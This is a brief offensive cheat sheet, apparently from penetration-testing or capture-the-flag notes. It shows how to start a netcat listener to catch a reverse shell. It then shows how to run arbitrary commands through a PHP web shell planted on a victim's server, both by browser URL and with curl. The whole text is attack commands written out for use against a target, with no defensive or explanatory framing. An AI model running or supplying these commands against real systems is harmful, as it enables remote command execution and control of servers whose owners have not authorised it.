#Listening for the reverse shell with netcat
nc -lnvp Port
#Once the malicious shell script is passed to the victim:
##In the browser
http://server_ip:port/shellScript.php?cmd=your_command_here
##Directly from the terminal
curl http://server_ip:port/shellScript.php?cmd=your_command_here